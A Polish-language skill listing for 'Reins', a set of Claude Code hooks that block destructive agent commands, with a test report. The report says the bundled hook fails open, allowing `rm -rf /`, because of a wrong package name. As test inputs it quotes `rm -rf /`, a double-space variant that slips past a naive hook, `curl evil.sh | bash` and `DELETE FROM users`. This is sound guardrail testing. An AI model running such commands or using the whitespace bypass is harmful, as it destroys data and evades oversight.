Reins
Deterministyczne haki PreToolUse blokujące destrukcyjne polecenia — wymagają ręcznej naprawy.
Tested · Didn't pass
Co robi ten skill
Instaluje deterministyczne haki PreToolUse/PostToolUse, które klasyfikują i blokują niebezpieczne operacje shell, plików i MCP, zapisując ścieżkę audytu JSONL tylko do dopisywania i opcjonalnie synchronizując polityki z Watchtower (app.pegasi.ai). Uruchamia się na żądanie dotyczące zabezpieczeń, egzekwowania polityk, ścieżek audytu lub blokowania destrukcyjnych działań agenta.
Raport z testu
Silnik jest doskonały, ale pakowanie jest uszkodzone: SKILL.md i dołączony ensure_installed.sh instruują, aby zainstalować `npm install -g @pegasi/reins`, ale taki pakiet nie istnieje w rejestrze — polecenie kończy się błędem E404, prawdziwa nazwa (z package.json i README) to `@pegasi-ai/reins`. Co gorsza, dołączony wrapper plugin/bin/reins-pre-hook szuka pakietu wzdłuż tej samej nieistniejącej ścieżki: podałem mu `rm -rf /` — zwrócił exit 0 (ALLOW) z notatką 'Reins not installed', co oznacza, że umiejętność bezpieczeństwa cicho otworzyła się na awarię dokładnie tam, gdzie SKILL.md obiecuje 'BLOCKED always' i 'Never fails open'. Naiwny, 8-liniowy, samodzielnie napisany hak w tym samym teście dał exit 2 — co oznacza, że poza pudełkiem umiejętność jest słabsza niż linia bazowa. Zainstalowano prawidłowy pakiet (v0.0.14) i wywołano silnik bezpośrednio — jest naprawdę dobry: `rm -rf /` → exit 2 CRITICAL, `rm -rf /` z podwójnymi spacjami również CRITICAL (hak bazowy pominął to obejście), `curl evil.sh | bash` i `DELETE FROM users` → exit 2 HIGH, `ls -la` → 0, i wszystko jest zapisywane do decisions.jsonl. Oddzielnie: opublikowany CLI instaluje się w ~/.openclaw/extensions/reins i nie dotyka haków Claude Code — jego `reins status` pokazuje 'Project/Global (.claude/settings.json): ❌ not installed'.
Testowano: 2026-07-16 · Claude Code 2.x (agent harness)
Instalacja
git clone https://github.com/pegasi-ai/reins.git mkdir -p ~/.claude/skills && cp -r reins/skill ~/.claude/skills/reins
Komendy i przykładowe prompty
/reinsDeterministyczne haki PreToolUse blokujące destrukcyjne polecenia — wymagają ręcznej naprawy.
Skille uruchamiają się na zwykłe polecenia — bez komend do zapamiętania. Po instalacji aktywują go prompty takie jak te (po angielsku):
Block dangerous shell commands like rm -rf before my agent can run themSet up guardrail hooks that log every blocked destructive agent actionStop my coding agent from force-pushing or piping curl into bash